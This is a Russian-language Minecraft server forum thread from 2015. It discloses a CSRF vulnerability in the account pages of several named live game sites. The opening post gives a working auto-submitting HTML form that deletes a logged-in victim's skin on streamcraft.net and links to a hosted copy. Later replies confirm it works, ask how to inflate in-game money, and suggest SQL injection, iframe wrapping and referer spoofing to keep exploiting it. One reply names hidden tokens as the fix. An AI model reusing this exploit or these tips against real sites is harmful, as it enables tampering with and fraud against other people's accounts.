1. Вы находитесь в сообществе Rubukkit. Мы - администраторы серверов Minecraft, разрабатываем собственные плагины и переводим на различные языки плагины наших коллег из других стран.
    Скрыть объявление
Скрыть объявление
В преддверии глобального обновления, мы проводим исследования, которые помогут нам сделать опыт пользования форумом ещё удобнее. Помогите нам, примите участие!

CSRF уязвимость на: Всех проектах McLab, MinecraftOnly, Еще много где

Тема в разделе "Обсуждение Minecraft", создана пользователем unlimited, 7 июн 2015.

  1. Автор темы
    unlimited

    unlimited Старожил Пользователь

    Баллы:
    123
    Имя в Minecraft:
    infinity
    Не знаю зачем сейчас копался в streamcraft'е, наткнулся в их личном кабинете на типичную CSRF уязвимость (3 по популярности веб уязвимость в мире).
    Начал смотреть дальше, заражены очень много проектов с горе-паблик-личными-клиентами.
    streamcraft.net
    oneland.su
    frostland.pro
    minecraftonly.ru
    и т.д.

    В кратце с помощью уязвимости можно делать любые вещи в личном кабинете если игрок перейдет по определенной ссылке с вредоносным скриптом на вашем конце.

    Proof of concept - вот небольшой html код
    <form method="POST" action="http://streamcraft.net/cabinet">
    <input type="hidden" name="delskin" value="lol">
    <input type="submit" id="doit" value="Hello">
    </form>
    <script>
    document.getElementById("doit").click();
    </script>

    Размещенный на вашем сайте на вашей ссылке, если человек, авторизованный в лк стримкрафта перейдет по ссылке с таким кодом - его скин автоматически удалится.
    Можете проверить сами - http://starcrack.hol.es/babon/csrf.html
     
  2. Plasticable

    Plasticable Старожил Девелопер Пользователь

    Баллы:
    173
    Skype:
    plasticable
    Имя в Minecraft:
    Plasticable
    Проверил, работает
     
  3. Kirich

    Kirich Активный участник Пользователь

    Баллы:
    78
    Уго
     
  4. saharin94

    saharin94 Старожил Пользователь Заблокирован

    Баллы:
    173
    "Хорошие" у них кодеры :) Бывает, что в некоторых магазинах можно вещи бесплатно покупать, а то и накручивать деньги на счёте.
     
  5. Kirich

    Kirich Активный участник Пользователь

    Баллы:
    78
    Жаль на stteamcraft нельзя))
     
  6. DEFKALION

    DEFKALION Активный участник Пользователь

    Баллы:
    76
    Такс, а можно ли сделать что бы деньги можно было накрутить? В лс
     
  7. Kirich

    Kirich Активный участник Пользователь

    Баллы:
    78
    Sql инъекция например...
     
  8. Vladlen_198

    Vladlen_198 Старожил Пользователь

    Баллы:
    108
    Skype:
    ultrashock98
    Имя в Minecraft:
    UltraShock
  9. Автор темы
    unlimited

    unlimited Старожил Пользователь

    Баллы:
    123
    Имя в Minecraft:
    infinity
  10. saharin94

    saharin94 Старожил Пользователь Заблокирован

    Баллы:
    173
  11. VareZzZz

    VareZzZz Старожил Пользователь

    Баллы:
    153
    Главное то, что теперь все это дело (Описанное выше) не работает. :)

    Это уж точно не про нас.
     
  12. danilko

    danilko Старожил Пользователь

    Баллы:
    103
    Если так, то пихаем в ифрейм и продолжаем использовать дыру)
     
  13. Vladlen_198

    Vladlen_198 Старожил Пользователь

    Баллы:
    108
    Skype:
    ultrashock98
    Имя в Minecraft:
    UltraShock
    +
     
  14. fastin

    fastin Активный участник Пользователь

    Баллы:
    78
    Skype:
    the.infastin
    Мне кажется не надо было создавать эту тему (Пофиксят же)
     
  15. alexandrage

    alexandrage Старожил Пользователь

    Баллы:
    173
    Работает, просто нужно подделать referer. Для этого достаточно юзануть к примеру curl. Потому нужно юзать скрытый токен.
     
  16. fastin

    fastin Активный участник Пользователь

    Баллы:
    78
    Skype:
    the.infastin
    Самая гениальная идея!
     
  17. kDas

    kDas Старожил Пользователь

    Баллы:
    123
    Skype:
    dasjke
    Имя в Minecraft:
    kDasRU
    @VareZzZz, а вы не пробовали использовать что-то нормальное в своих проектах, отличное костыляния вокруг DLE и вообще PHP? :)
     
  18. MySt1k

    MySt1k Старожил Пользователь

    Баллы:
    173
    А зачем? Деньги ведь и так идут
     
  19. fastin

    fastin Активный участник Пользователь

    Баллы:
    78
    Skype:
    the.infastin
    +
     
  20. Warchiefs

    Warchiefs Активный участник Пользователь

    Баллы:
    88
    Имя в Minecraft:
    Warchiefs
    А что ты имеешь ввиду, когда говоришь "и вообще PHP"?
     

Поделиться этой страницей